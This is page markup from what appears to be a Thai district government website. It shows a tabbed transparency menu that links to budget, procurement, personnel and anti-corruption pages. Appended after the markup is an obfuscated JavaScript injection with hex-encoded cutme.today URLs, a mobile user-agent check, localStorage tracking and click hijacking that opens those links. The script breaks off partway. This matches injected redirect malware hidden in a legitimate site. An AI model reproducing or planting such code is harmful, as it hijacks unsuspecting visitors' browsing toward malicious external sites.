con\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมคุณธรรมและความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"}],\"iSize\":16,\"titleColor\":\"#000000\",\"titleColorHover\":\"#ffffff\",\"titleColorActive\":\"#ffffff\",\"titleBg\":\"#8ed1fc\",\"titleBgHover\":\"#8ed1fc\",\"titleBgActive\":\"#0693e3\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBorderActive\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBorderWidth\":[0,0,0,0],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,0,0],\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"fontWeight\":\"bold\",\"verticalTabWidth\":[38,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id871_e416be-74 kt-tabs-has-7-tabs kt-active-tab-4 kt-tabs-layout-vtabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-left \"><ul class=\"kt-tabs-title-list\"><li id=\"tab-\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span class=\"kt-title-text\">ข้อมูลพื้นฐาน</span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span class=\"kt-title-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-3 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"3\" class=\"kt-tab-title kt-tab-title-3 \"><span class=\"kt-title-text\"><strong>การจัดซื้อจัดจ้าง</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-4 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-active\"><a href=\"#tab-strongstrong\" data-tab=\"4\" class=\"kt-tab-title kt-tab-title-4 \"><span class=\"kt-title-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-5 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"5\" class=\"kt-tab-title kt-tab-title-5 \"><span class=\"kt-title-text\"><strong>การส่งเสริมความโปร่งใส</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-6 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"6\" class=\"kt-tab-title kt-tab-title-6 \"><span class=\"kt-title-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-7 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"7\" class=\"kt-tab-title kt-tab-title-7 \"><span class=\"kt-title-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"_a471bf-67\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab_a471bf-67\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_f98827-df\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_f98827-df kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_d803ff-d2\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_d803ff-d2\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\">โครงสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_921bc2-5c\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_921bc2-5c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_cba98e-ee\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_cba98e-ee\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\">อำนาจหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_77fcfe-f3\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_77fcfe-f3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_e9af1d-e0\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_e9af1d-e0\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\">ข่าวประชาสัมพันธ์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_1087e8-9a\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_1087e8-9a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=506\">Q&amp;A</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"_a3f15d-d7\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab_a3f15d-d7\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_8bd340-cd\",\"color\":\"#0693e3\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_8bd340-cd kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_eb7e47-e1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_eb7e47-e1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=780\" data-type=\"page\" data-id=\"780\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_cdf90d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_cdf90d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=824\">แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_eb0ffb-85\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_eb0ffb-85\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=703\" data-type=\"page\" data-id=\"703\">รายงานผลการดำเนินงานประจำปี</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_da22bc-41\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_da22bc-41\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\" data-type=\"page\" data-id=\"784\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_df06d7-11\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_df06d7-11\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=771\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_006068-f2\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_006068-f2\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=776\" data-type=\"page\" data-id=\"776\">ข้อมูลเชิงสถิติการให้บริการ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_b2d0c3-79\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_b2d0c3-79\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":3,\"uniqueID\":\"_bcc767-12\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-3 kt-inner-tab_bcc767-12\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_948636-84\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_948636-84 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_3edff3-bb\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_3edff3-bb\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=840\" data-type=\"page\" data-id=\"840\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_9ab5d8-54\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_9ab5d8-54\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_b37671-e5\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_b37671-e5\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=851\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_317e6f-33\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_317e6f-33\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=855\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":4,\"uniqueID\":\"_e603b6-8d\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-4 kt-inner-tab_e603b6-8d\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_37f8e2-2d\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_37f8e2-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_12bed0-a6\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_12bed0-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_7e4f7d-a0\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_7e4f7d-a0\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><strong>รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_4e465f-3b\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_4e465f-3b\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=851\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_9028d2-dc\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_9028d2-dc\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=900\" data-type=\"page\" data-id=\"900\">การขับเคลื่อนจริยธรรม</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":5,\"uniqueID\":\"_ff999a-98\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-5 kt-inner-tab_ff999a-98\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_25468b-f6\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_25468b-f6 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_ae038f-10\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_ae038f-10\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_667e50-fd\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_667e50-fd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_22db24-50\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_22db24-50\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=680\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_39740e-99\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_39740e-99\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=708\" data-type=\"page\" data-id=\"708\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":6,\"uniqueID\":\"_387c35-4e\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-6 kt-inner-tab_387c35-4e\"><div class=\"kt-tab-inner-content-inner\"></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":7,\"uniqueID\":\"_ea5a2e-14\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-7 kt-inner-tab_ea5a2e-14\"><div class=\"kt-tab-inner-content-inner\"></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n<!-- /wp:generateblocks/container -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v 